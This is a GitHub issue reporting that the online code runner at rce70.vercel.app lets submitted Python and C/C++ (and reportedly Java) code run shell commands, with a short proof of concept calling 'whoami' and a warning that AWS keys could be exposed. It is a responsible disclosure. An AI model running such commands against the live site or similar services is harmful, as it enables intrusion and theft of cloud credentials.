search

suyashvsingh / rce70-lambda

Serverless files for RCE70
0 stars 0 forks source link

Shell command execution on site rce70.vercel.app, if using Python, C/C++ and Java #1

Open Reedus0 opened 9 months ago

Reedus0 commented 9 months ago

Description

Allowing users to write arbitrary code causes shell command execution.

Proof of concept

  1. Go to https://rce70.vercel.app/
  2. Chose one of the languages: Python, C/C++
  3. Use code down below for your language
  4. Run the code

    Python

    
import os

os.system("whoami")

### C/C++

include

include

int main() {

system("whoami");

return 0;

}



# Impact
 This vulnerability can cause sensitive data exposure for example AWS secret keys and tokens could be exposed. Java language is also affected by this vulnerability.
suyashvsingh commented 9 months ago

Thanks for bringing it to my notice.